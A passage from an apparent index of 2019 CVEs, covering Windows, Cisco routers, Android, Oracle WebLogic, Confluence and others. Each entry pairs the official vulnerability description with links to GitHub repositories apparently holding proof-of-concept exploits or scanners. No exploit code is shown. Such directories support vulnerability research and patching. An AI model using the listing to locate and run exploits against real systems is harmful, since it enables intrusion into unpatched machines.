An elevation of privilege vulnerability exists when the Windows AppX Deployment Extensions improperly performs privilege management, resulting in access to system files. To exploit this vulnerability, an authenticated attacker would need to run a specially crafted application to elevate privileges. The security update addresses the vulnerability by correcting how AppX Deployment Extensions manages privileges, aka 'Windows AppX Deployment Extensions Elevation of Privilege Vulnerability'.

- [0x413x4/CVE-2019-1385](https://github.com/0x413x4/CVE-2019-1385)

### CVE-2019-1388 (2019-11-12)

An elevation of privilege vulnerability exists in the Windows Certificate Dialog when it does not properly enforce user privileges, aka 'Windows Certificate Dialog Elevation of Privilege Vulnerability'.

- [jas502n/CVE-2019-1388](https://github.com/jas502n/CVE-2019-1388)
- [jaychouzzk/CVE-2019-1388](https://github.com/jaychouzzk/CVE-2019-1388)
- [sv3nbeast/CVE-2019-1388](https://github.com/sv3nbeast/CVE-2019-1388)
- [nobodyatall648/CVE-2019-1388](https://github.com/nobodyatall648/CVE-2019-1388)
- [suprise4u/CVE-2019-1388](https://github.com/suprise4u/CVE-2019-1388)

### CVE-2019-1402 (2019-11-12)

An information disclosure vulnerability exists in Microsoft Office software when the software fails to properly handle objects in memory, aka 'Microsoft Office Information Disclosure Vulnerability'.

- [lauxjpn/CorruptQueryAccessWorkaround](https://github.com/lauxjpn/CorruptQueryAccessWorkaround)

### CVE-2019-1405 (2019-11-12)

An elevation of privilege vulnerability exists when the Windows Universal Plug and Play (UPnP) service improperly allows COM object creation, aka 'Windows UPnP Service Elevation of Privilege Vulnerability'.

- [apt69/COMahawk](https://github.com/apt69/COMahawk)

### CVE-2019-1422 (2019-11-12)

An elevation of privilege vulnerability exists in the way that the iphlpsvc.dll handles file creation allowing for a file overwrite, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-1420, CVE-2019-1423.

- [ze0r/cve-2019-1422](https://github.com/ze0r/cve-2019-1422)

### CVE-2019-1458 (2019-12-10)

An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'.

- [piotrflorczyk/cve-2019-1458_POC](https://github.com/piotrflorczyk/cve-2019-1458_POC)
- [rip1s/CVE-2019-1458](https://github.com/rip1s/CVE-2019-1458)
- [Eternit7/CVE-2019-1458](https://github.com/Eternit7/CVE-2019-1458)

### CVE-2019-1476 (2019-12-10)

An elevation of privilege vulnerability exists when Windows AppX Deployment Service (AppXSVC) improperly handles hard links, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-1483.

- [sgabe/CVE-2019-1476](https://github.com/sgabe/CVE-2019-1476)

### CVE-2019-1579 (2019-07-19)

Remote Code Execution in PAN-OS 7.1.18 and earlier, PAN-OS 8.0.11-h1 and earlier, and PAN-OS 8.1.2 and earlier with GlobalProtect Portal or GlobalProtect Gateway Interface enabled may allow an unauthenticated remote attacker to execute arbitrary code.

- [securifera/CVE-2019-1579](https://github.com/securifera/CVE-2019-1579)
- [Elsfa7-110/CVE-2019-1579](https://github.com/Elsfa7-110/CVE-2019-1579)

### CVE-2019-1652 (2019-01-24)

A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands. The vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending malicious HTTP POST requests to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux shell as root. Cisco has released firmware updates that address this vulnerability.

- [0x27/CiscoRV320Dump](https://github.com/0x27/CiscoRV320Dump)

### CVE-2019-1653 (2019-01-24)

A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated, remote attacker to retrieve sensitive information. The vulnerability is due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information. Cisco has released firmware updates that address this vulnerability.

- [dubfr33/CVE-2019-1653](https://github.com/dubfr33/CVE-2019-1653)
- [shaheemirza/CiscoSpill](https://github.com/shaheemirza/CiscoSpill)
- [ibrahimzx/CVE-2019-1653](https://github.com/ibrahimzx/CVE-2019-1653)

### CVE-2019-1663 (2019-02-28)

A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. The vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system of the affected device as a high-privilege user. RV110W Wireless-N VPN Firewall versions prior to 1.2.2.1 are affected. RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected. RV215W Wireless-N VPN Router versions prior to 1.3.1.1 are affected.

- [StealYourCode/CVE-2019-1663](https://github.com/StealYourCode/CVE-2019-1663)
- [abrumsen/CVE-2019-1663](https://github.com/abrumsen/CVE-2019-1663)

### CVE-2019-1698 (2019-02-21)

A vulnerability in the web-based user interface of Cisco Internet of Things Field Network Director (IoT-FND) Software could allow an authenticated, remote attacker to gain read access to information that is stored on an affected system. The vulnerability is due to improper handling of XML External Entity (XXE) entries when parsing certain XML files. An attacker could exploit this vulnerability by importing a crafted XML file with malicious entries, which could allow the attacker to read files within the affected application. Versions prior to 4.4(0.26) are affected.

- [raytran54/CVE-2019-1698](https://github.com/raytran54/CVE-2019-1698)

### CVE-2019-1759 (2019-03-28)

A vulnerability in access control list (ACL) functionality of the Gigabit Ethernet Management interface of Cisco IOS XE Software could allow an unauthenticated, remote attacker to reach the configured IP addresses on the Gigabit Ethernet Management interface. The vulnerability is due to a logic error that was introduced in the Cisco IOS XE Software 16.1.1 Release, which prevents the ACL from working when applied against the management interface. An attacker could exploit this issue by attempting to access the device via the management interface.

- [r3m0t3nu11/CVE-2019-1759-csrf-js-rce](https://github.com/r3m0t3nu11/CVE-2019-1759-csrf-js-rce)

### CVE-2019-1821 (2019-05-16)

A vulnerability in the web-based management interface of Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager could allow an authenticated, remote attacker to execute code with root-level privileges on the underlying operating system. This vulnerability exists because the software improperly validates user-supplied input. An attacker could exploit this vulnerability by uploading a malicious file to the administrative web interface. A successful exploit could allow the attacker to execute code with root-level privileges on the underlying operating system.

- [k8gege/CiscoExploit](https://github.com/k8gege/CiscoExploit)

### CVE-2019-1881 (2019-06-05)

A vulnerability in the web-based management interface of Cisco Industrial Network Director (IND) could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack and perform arbitrary actions on an affected device. The vulnerability is due to insufficient CSRF protections for the web-based management interface of the affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a malicious link. A successful exploit could allow the attacker to use a web browser and the privileges of the user to perform arbitrary actions on an affected device. For more information about CSRF attacks and potential mitigations, see Understanding Cross-Site Request Forgery Threat Vectors.

- [Shadawks/Strapi-CVE-2019-1881](https://github.com/Shadawks/Strapi-CVE-2019-1881)

### CVE-2019-2107 (2019-07-08)

In ihevcd_parse_pps of ihevcd_parse_headers.c, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android-9. Android ID: A-130024844.

- [CrackerCat/CVE-2019-2107](https://github.com/CrackerCat/CVE-2019-2107)
- [infiniteLoopers/CVE-2019-2107](https://github.com/infiniteLoopers/CVE-2019-2107)

### CVE-2019-2196 (2019-11-13)

In Download Provider, there is a possible SQL injection. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-8.0 Android-8.1 Android-9 Android-10. Android ID: A-135269143.

- [IOActive/AOSP-DownloadProviderDbDumperSQLiLimit](https://github.com/IOActive/AOSP-DownloadProviderDbDumperSQLiLimit)

### CVE-2019-2198 (2019-11-13)

In Download Provider, there is a possible SQL injection vulnerability. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-8.0 Android-8.1 Android-9 Android-10. Android ID: A-135270103.

- [IOActive/AOSP-DownloadProviderDbDumperSQLiWhere](https://github.com/IOActive/AOSP-DownloadProviderDbDumperSQLiWhere)

### CVE-2019-2205 (2019-11-13)

In ProxyResolverV8::SetPacScript of proxy_resolver_v8.cc, there is a possible memory corruption due to a use after free. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-8.0 Android-8.1 Android-9 Android-10. Android ID: A-139806216.

- [aemmitt-ns/pacpoc](https://github.com/aemmitt-ns/pacpoc)

### CVE-2019-2215 (2019-10-11)

A use-after-free in binder.c allows an elevation of privilege from an application to the Linux Kernel. No user interaction is required to exploit this vulnerability; however, exploitation does require either the installation of a malicious local application or a separate vulnerability in a network facing application. Product: Android. Android ID: A-141720095.

- [timwr/CVE-2019-2215](https://github.com/timwr/CVE-2019-2215)
- [raystyle/CVE-2019-2215](https://github.com/raystyle/CVE-2019-2215)
- [kangtastic/cve-2019-2215](https://github.com/kangtastic/cve-2019-2215)
- [ATorNinja/CVE-2019-2215](https://github.com/ATorNinja/CVE-2019-2215)
- [LIznzn/CVE-2019-2215](https://github.com/LIznzn/CVE-2019-2215)
- [DimitriFourny/cve-2019-2215](https://github.com/DimitriFourny/cve-2019-2215)
- [qre0ct/android-kernel-exploitation-ashfaq-CVE-2019-2215](https://github.com/qre0ct/android-kernel-exploitation-ashfaq-CVE-2019-2215)
- [sharif-dev/AndroidKernelVulnerability](https://github.com/sharif-dev/AndroidKernelVulnerability)
- [c3r34lk1ll3r/CVE-2019-2215](https://github.com/c3r34lk1ll3r/CVE-2019-2215)
- [Byte-Master-101/CVE-2019-2215](https://github.com/Byte-Master-101/CVE-2019-2215)
- [mufidmb38/CVE-2019-2215](https://github.com/mufidmb38/CVE-2019-2215)
- [CrackerCat/Rootsmart-v2.0](https://github.com/CrackerCat/Rootsmart-v2.0)
- [enceka/cve-2019-2215-3.18](https://github.com/enceka/cve-2019-2215-3.18)
- [elbiazo/CVE-2019-2215](https://github.com/elbiazo/CVE-2019-2215)
- [stevejubx/CVE-2019-2215](https://github.com/stevejubx/CVE-2019-2215)
- [willboka/CVE-2019-2215-HuaweiP20Lite](https://github.com/willboka/CVE-2019-2215-HuaweiP20Lite)
- [mutur4/CVE-2019-2215](https://github.com/mutur4/CVE-2019-2215)
- [R0rt1z2/huawei-unlock](https://github.com/R0rt1z2/huawei-unlock)
- [raymontag/CVE-2019-2215](https://github.com/raymontag/CVE-2019-2215)

### CVE-2019-2525 (2019-01-16)

Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Supported versions that are affected are prior to 5.2.24 and prior to 6.0.2. Difficult to exploit vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. CVSS 3.0 Base Score 5.6 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N).

- [Phantomn/VirtualBox_CVE-2019-2525-CVE-2019-2548](https://github.com/Phantomn/VirtualBox_CVE-2019-2525-CVE-2019-2548)
- [wotmd/VirtualBox-6.0.0-Exploit-1-day](https://github.com/wotmd/VirtualBox-6.0.0-Exploit-1-day)

### CVE-2019-2615 (2019-04-23)

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.0 Base Score 4.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N).

- [chiaifan/CVE-2019-2615](https://github.com/chiaifan/CVE-2019-2615)

### CVE-2019-2618 (2019-04-23)

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data as well as unauthorized update, insert or delete access to some of Oracle WebLogic Server accessible data. CVSS 3.0 Base Score 5.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N).

- [pyn3rd/CVE-2019-2618](https://github.com/pyn3rd/CVE-2019-2618)
- [jas502n/cve-2019-2618](https://github.com/jas502n/cve-2019-2618)
- [wsfengfan/CVE-2019-2618-](https://github.com/wsfengfan/CVE-2019-2618-)
- [dr0op/WeblogicScan](https://github.com/dr0op/WeblogicScan)
- [he1dan/cve-2019-2618](https://github.com/he1dan/cve-2019-2618)
- [ianxtianxt/cve-2019-2618](https://github.com/ianxtianxt/cve-2019-2618)
- [0xn0ne/weblogicScanner](https://github.com/0xn0ne/weblogicScanner)

### CVE-2019-2725 (2019-04-26)

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

- [shack2/javaserializetools](https://github.com/shack2/javaserializetools)
- [SkyBlueEternal/CNVD-C-2019-48814-CNNVD-201904-961](https://github.com/SkyBlueEternal/CNVD-C-2019-48814-CNNVD-201904-961)
- [tobechenghuai/CNTA-2019-0014xCVE-2019-2725](https://github.com/tobechenghuai/CNTA-2019-0014xCVE-2019-2725)
- [lasensio/cve-2019-2725](https://github.com/lasensio/cve-2019-2725)
- [davidmthomsen/CVE-2019-2725](https://github.com/davidmthomsen/CVE-2019-2725)
- [leerina/CVE-2019-2725](https://github.com/leerina/CVE-2019-2725)
- [zhusx110/cve-2019-2725](https://github.com/zhusx110/cve-2019-2725)
- [lufeirider/CVE-2019-2725](https://github.com/lufeirider/CVE-2019-2725)
- [TopScrew/CVE-2019-2725](https://github.com/TopScrew/CVE-2019-2725)
- [welove88888/CVE-2019-2725](https://github.com/welove88888/CVE-2019-2725)
- [jiansiting/CVE-2019-2725](https://github.com/jiansiting/CVE-2019-2725)
- [kerlingcode/CVE-2019-2725](https://github.com/kerlingcode/CVE-2019-2725)
- [black-mirror/Weblogic](https://github.com/black-mirror/Weblogic)
- [pimps/CVE-2019-2725](https://github.com/pimps/CVE-2019-2725)
- [ianxtianxt/CVE-2019-2725](https://github.com/ianxtianxt/CVE-2019-2725)
- [N0b1e6/CVE-2019-2725-POC](https://github.com/N0b1e6/CVE-2019-2725-POC)
- [GGyao/weblogic_2019_2725_wls_batch](https://github.com/GGyao/weblogic_2019_2725_wls_batch)
- [ludy-dev/Oracle-WLS-Weblogic-RCE](https://github.com/ludy-dev/Oracle-WLS-Weblogic-RCE)
- [1stPeak/CVE-2019-2725-environment](https://github.com/1stPeak/CVE-2019-2725-environment)
- [CalegariMindSec/Exploit-CVE-2019-2725](https://github.com/CalegariMindSec/Exploit-CVE-2019-2725)

### CVE-2019-2729 (2019-06-19)

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

- [waffl3ss/CVE-2019-2729](https://github.com/waffl3ss/CVE-2019-2729)
- [ruthlezs/CVE-2019-2729-Exploit](https://github.com/ruthlezs/CVE-2019-2729-Exploit)
- [pizza-power/weblogic-CVE-2019-2729-POC](https://github.com/pizza-power/weblogic-CVE-2019-2729-POC)
- [Luchoane/CVE-2019-2729_creal](https://github.com/Luchoane/CVE-2019-2729_creal)

### CVE-2019-2888 (2019-10-16)

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: EJB Container). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebLogic Server accessible data. CVSS 3.0 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).

- [jas502n/CVE-2019-2888](https://github.com/jas502n/CVE-2019-2888)

### CVE-2019-2890 (2019-10-16)

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Web Services). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0. Easily exploitable vulnerability allows high privileged attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).

- [ZO1RO/CVE-2019-2890](https://github.com/ZO1RO/CVE-2019-2890)
- [Ky0-HVA/CVE-2019-2890](https://github.com/Ky0-HVA/CVE-2019-2890)
- [freeide/weblogic_cve-2019-2890](https://github.com/freeide/weblogic_cve-2019-2890)
- [l1nk3rlin/CVE-2019-2890](https://github.com/l1nk3rlin/CVE-2019-2890)
- [jas502n/CVE-2019-2890](https://github.com/jas502n/CVE-2019-2890)
- [ianxtianxt/CVE-2019-2890](https://github.com/ianxtianxt/CVE-2019-2890)
- [zhzhdoai/Weblogic_Vuln](https://github.com/zhzhdoai/Weblogic_Vuln)

### CVE-2019-3010 (2019-10-16)

Vulnerability in the Oracle Solaris product of Oracle Systems (component: XScreenSaver). The supported version that is affected is 11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. While the vulnerability is in Oracle Solaris, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle Solaris. CVSS 3.0 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H).

- [chaizeg/privilege-escalation-breach](https://github.com/chaizeg/privilege-escalation-breach)

### CVE-2019-3394 (2019-08-29)

There was a local file disclosure vulnerability in Confluence Server and Confluence Data Center via page exporting. An attacker with permission to edit a page is able to exploit this issue to read arbitrary files on the server under the `<install-directory>/confluence/WEB-INF` directory, which may contain configuration files used for integrating with other services and which could potentially leak credentials or other sensitive information such as LDAP credentials. The LDAP credential will be potentially leaked only if the Confluence server is configured to use LDAP as user repository. All versions of Confluence Server from 6.1.0 before 6.6.16 (the fixed version for 6.6.x), from 6.7.0 before 6.13.7 (the fixed version for 6.13.x), and from 6.14.0 before 6.15.8 (the fixed version for 6.15.x) are affected by this vulnerability.

- [jas502n/CVE-2019-3394](https://github.com/jas502n/CVE-2019-3394)

### CVE-2019-3396 (2019-03-25)

The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.

- [dothanthitiendiettiende/CVE-2019-3396](https://github.com/dothanthitiendiettiende/CVE-2019-3396)
- [x-f1v3/CVE-2019-3396](https://github.com/x-f1v3/CVE-2019-3396)
- [xiaoshuier/CVE-2019-3396](https://github.com/xiaoshuier/CVE-2019-3396)
- [Yt1g3r/CVE-2019-3396_EXP](https://github.com/Yt1g3r/CVE-2019-3396_EXP)
- [jas502n/CVE-2019-3396](https://github.com/jas502n/CVE-2019-3396)
- [pyn3rd/CVE-2019-3396](https://github.com/pyn3rd/CVE-2019-3396)
- [s1xg0d/CVE-2019-3396](https://github.com/s1xg0d/CVE-2019-3396)
- [quanpt103/CVE-2019-3396](https://github.com/quanpt103/CVE-2019-3396)
- [vntest11/confluence_CVE-2019-3396](https://github.com/vntest11/confluence_CVE-2019-3396)
- [tanw923/test1](https://github.com/tanw923/test1)
- [skommando/CVE-2019-3396-confluence-poc](https://github.com/skommando/CVE-2019-3396-confluence-poc)
- [JonathanZhou348/CVE-2019-3396TEST](https://github.com/JonathanZhou348/CVE-2019-3396TEST)
- [am6539/CVE-2019-3396](https://github.com/am6539/CVE-2019-3396)
- [W2Ning/CVE-2019-3396](https://github.com/W2Ning/CVE-2019-3396)
- [yuehanked/cve-2019-3396](https://github.com/yuehanked/cve-2019-3396)
- [0xNinjaCyclone/cve-2019-3396](https://github.com/0xNinjaCyclone/cve-2019-3396)
- [46o60/CVE-2019-3396_Confluence](https://github.com/46o60/CVE-2019-3396_Confluence)
- [PetrusViet/cve-2019-3396](https://github.com/PetrusViet/cve-2019-3396)
- [Avento/CVE-2019-3396-Memshell-for-Behinder](https://github.com/Avento/CVE-2019-3396-Memshell-for-Behinder)

### CVE-2019-3398 (2019-04-18)

Confluence Server and Data Center had a path traversal vulnerability in the downloadallattachments resource. A remote attacker who has permission to add attachments to pages and/or blogs, to create a new space or a personal space, or who has 'Admin' permissions for a space can exploit this path traversal vulnerability to write files to arbitrary locations, which can lead to remote code execution on systems that run a vulnerable version of Confluence Server or Data Center. All versions of Confluence Server from 2.0.0 before 6.6.13 (the fixed version for 6.6.x), from 6.7.0 before 6.12.4 (the fixed version for 6.12.x), from 6.13.0 before 6.13.4 (the fixed version for 6.13.x), from 6.14.0 before 6.14.3 (the fixed version for 6.14.x), and from 6.15.0 before 6.15.2 are affected by this vulnerability.

- [superevr/cve-2019-3398](https://github.com/superevr/cve-2019-3398)
- [132231g/CVE-2019-3398](https://github.com/132231g/CVE-2019-3398)

### CVE-2019-3403 (2019-05-22)

The /rest/api/2/user/picker rest resource in Jira before version 7.13.3, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check.

- [und3sc0n0c1d0/UserEnumJira](https://github.com/und3sc0n0c1d0/UserEnumJira)
- [davidmckennirey/CVE-2019-3403](https://github.com/davidmckennirey/CVE-2019-3403)

### CVE-2019-3462 (2019-01-28)

Incorrect sanitation of the 302 redirect field in HTTP transport method of apt versions 1.4.8 and earlier can lead to content injection by a MITM attacker, potentially leading to remote code execution on the target machine.

- [tonejito/check_CVE-2019-3462](https://github.com/tonejito/check_CVE-2019-3462)
- [atilacastro/update-apt-package](https://github.com/atilacastro/update-apt-package)

### CVE-2019-3663 (2019-11-13)

Unprotected Storage of Credentials vulnerability in McAfee Advanced Threat Defense (ATD) prior to 4.8 allows a local attacker to gain access to the root password by accessing sensitive files on the system. This was originally published with a CVSS rating of High; further investigation has resulted in this being updated to Critical. The root password is common across all instances of ATD prior to 4.8. See the Security bulletin for further details.

- [funoverip/mcafee_atd_CVE-2019-3663](https://github.com/funoverip/mcafee_atd_CVE-2019-3663)

### CVE-2019-3719 (2019-04-18)

Dell SupportAssist Client versions prior to 3.2.0.90 contain a remote code execution vulnerability. An unauthenticated attacker, sharing the network access layer with the vulnerable system, can compromise the vulnerable system by tricking a victim user into downloading and executing arbitrary executables via SupportAssist client from attacker hosted sites.

- [jiansiting/CVE-2019-3719](https://github.com/jiansiting/CVE-2019-3719)

### CVE-2019-3778 (2019-03-07)

Spring Security OAuth, versions 2.3 prior to 2.3.5, 2.2 prior to 2.2.4, 2.1 prior to 2.1.4, 2.0 prior to 2.0.17, and older unsupported versions could be susceptible to an open redirector attack that can leak an authorization code. A malicious user or attacker can craft a request to the authorization endpoint using the authorization code grant type and specify a manipulated redirection URI via the "redirect_uri" parameter. This can cause the authorization server to redirect the resource owner user-agent to a URI under the control of the attacker with the leaked authorization code. This vulnerability exposes applications that meet all of the following requirements: act in the role of an Authorization Server (e.g. @EnableAuthorizationServer) and use the DefaultRedirectResolver in the AuthorizationEndpoint. This vulnerability does not expose applications that: act in the role of an Authorization Server and use a RedirectResolver implementation other than DefaultRedirectResolver, act in the role of a Resource Server only (e.g. @EnableResourceServer), or act in the role of a Client only (e.g. @EnableOAuthClient).

- [BBB-man/CVE-2019-3778-Spring-Security-OAuth-2.3-Open-Redirection](https://github.com/BBB-man/CVE-2019-3778-Spring-Security-OAuth-2.3-Open-Redirection)

### CVE-2019-3799 (2019-05-06)

Spring Cloud Config, versions 2.1.x prior to 2.1.2, versions 2.0.x prior to 2.0.4, versions 1.4.x prior to 1.4.6, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead to a directory traversal attack.

- [mpgn/CVE-2019-3799](https://github.com/mpgn/CVE-2019-3799)
- [Corgizz/SpringCloud](https://github.com/Corgizz/SpringCloud)

### CVE-2019-3810 (2019-03-25)

A flaw was found in moodle versions 3.6 to 3.6.1, 3.5 to 3.5.3, 3.4 to 3.4.6, 3.1 to 3.1.15 and earlier unsupported versions. The /userpix/ page did not escape users' full names, which are included as text when hovering over profile images. Note this page is not linked to by default and its access is restricted.

- [farisv/Moodle-CVE-2019-3810](https://github.com/farisv/Moodle-CVE-2019-3810)

### CVE-2019-3847 (2019-03-27)

A vulnerability was found in moodle before versions 3.6.3, 3.5.5, 3.4.8 and 3.1.17. Users with the "login as other users" capability (such as administrators/managers) can access other users' Dashboards, but the JavaScript those other users may have added to their Dashboard was not being escaped when being viewed by the user logging in on their behalf.

- [danielthatcher/moodle-login-csrf](https://github.com/danielthatcher/moodle-login-csrf)

### CVE-2019-3929 (2019-04-30)

The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7 are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root.

- [xfox64x/CVE-2019-3929](https://github.com/xfox64x/CVE-2019-3929)

### CVE-2019-3980 (2019-10-08)

The Solarwinds Dameware Mini Remote Client agent v12.1.0.89 supports smart card authentication, which can allow a user to upload an executable to be executed on the DWRCS.exe host. An unauthenticated, remote attacker can request smart card login and upload and execute an arbitrary executable that runs under the Local System account.

- [warferik/CVE-2019-3980](https://github.com/warferik/CVE-2019-3980)
- [Barbarisch/CVE-2019-3980](https://github.com/Barbarisch/CVE-2019-3980)

### CVE-2019-4650 (2020-06-26)

IBM Maximo Asset Management 7.6.1.1 is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 170961.

- [aneeshanilkumar89/Maximo_Sql_Injection-CVE-2019-4650](https://github.com/aneeshanilkumar89/Maximo_Sql_Injection-CVE-2019-4650)

### CVE-2019-5010 (2019-10-31)

An exploitable denial-of-service vulnerability exists in the X509 certificate parser of Python.org Python 2.7.11 / 3.6.6. A specially crafted X509 certificate can cause a NULL pointer dereference, resulting in a denial of service. An attacker can initiate or accept TLS connections using crafted certificates to trigger this vulnerability.

- [JonathanWilbur/CVE-2019-5010](https://github.com/JonathanWilbur/CVE-2019-5010)

### CVE-2019-5029 (2019-11-13)

An exploitable command injection vulnerability exists in the Config editor of the Exhibitor Web UI versions 1.0.9 to 1.7.1. Arbitrary shell commands surrounded by backticks or $() can be inserted into the editor and will be executed by the Exhibitor process when it launches ZooKeeper. An attacker can execute any command as the user running the Exhibitor process.

- [thehunt1s0n/Exihibitor-RCE](https://github.com/thehunt1s0n/Exihibitor-RCE)

### CVE-2019-5096 (2019-12-03)

An exploitable code execution vulnerability exists in the processing of multipart/form-data requests within the base GoAhead web server application in versions v5.0.1, v4.1.1 and v3.6.5. A specially crafted HTTP request can lead to a use-after-free condition during the processing of this request that can be used to corrupt heap structures, which could lead to full code execution. The request can be unauthenticated in the form of GET or POST requests, and does not require the requested resource to exist on the server.

- [ianxtianxt/CVE-2019-5096-GoAhead-Web-Server-Dos-Exploit](https://github.com/ianxtianxt/CVE-2019-5096-GoAhead-Web-Server-Dos-Exploit)

### CVE-2019-5413 (2019-03-17)

An attacker can use the format parameter to inject arbitrary commands in the npm package morgan < 1.9.1.

- [forse01/CVE-2019-5413-NetBeans](https://github.com/forse01/CVE-2019-5413-NetBeans)
